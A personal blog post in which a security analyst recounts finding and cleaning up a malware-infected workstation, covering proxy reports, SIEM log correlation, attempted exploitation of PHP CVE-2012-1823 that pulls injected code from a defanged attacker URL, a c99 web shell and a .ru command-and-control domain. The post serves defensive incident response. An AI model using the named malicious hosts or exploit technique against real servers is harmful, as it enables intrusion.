That’s often the question I get asked by friends and family, and to be honest it’s hard to explain to non-techies so I figured I’d pick out a recent example of a typical malware find and cleanup at work and blog about it.
So it all started in the morning when I opened the daily report I email to myself from the proxy server that flags URL requests in categories I feel are malicious and accessed during the previous 24hrs. Once blowing past the usual false positives one stood out to me, music.gr (TLD for Greece). The report does not give full HTTP headers just the hostname so I had to look up the same hit in the proxy’s reporting server to get the time/date/username of the HTTP request. Then I moved to the SIEM (log manager) to get correlated logs from FWs, netflow, and the parsed raw proxy logs showing all the fields with a start and end time +/- 5 mins.
In doing so I saw obvious bad outbound traffic from the suspect host with what looked like URLs centered around webmail. This is not surprising as webmail is a significant weak spot in many corporations, anyway here are some of the logs I was presented with, a bit sanitized.
The long URLs looked interesting and familiar to me, and then I remembered they looked similar the logs one of the isc.sans.org handlers posted about HERE. They are attempts to exploit PHP vuln CVE-2012-1823 by rewriting the php configuration and making the server append certainly malicious code at the hxxp://18.104.22.168/info3.txt to the site’s index.html. I was able to get the malicious code from the link using Malzilla even days later as I write this. That code looked like this
This appears to be a short base64 encoded string. When decoded it was non-printable in ASCII. I’m not sure what’s its purpose is, perhaps it was just a way to mark servers that have been exploited successfully or further obfuscated with a key of some sorts. I found this Snort blog post about the topic they had a good idea to just switch to info2.txt which had a more expected code to inject, the c99 shell.
Anyway this client was attempting to attack other internet servers through my company’s network. So that’s not good! Also the krasguatanany.ru looks like a funky URL and it turned out to be C2 (command and control) attempts.
At this point I called the user and asked him to disconnect from the network, opened a helpdesk case, asked desktop support to bring me the computer and started taking a forensics image of the drive. This was more for practice and to mess around with later as I didn’t believe this was more than just “mass-malware” or common bot infection that was a targeted attack. The machine was scanned with several anti-malware tools and cleaned to my satisfaction, finding some Trojan’s and random obfuscated files.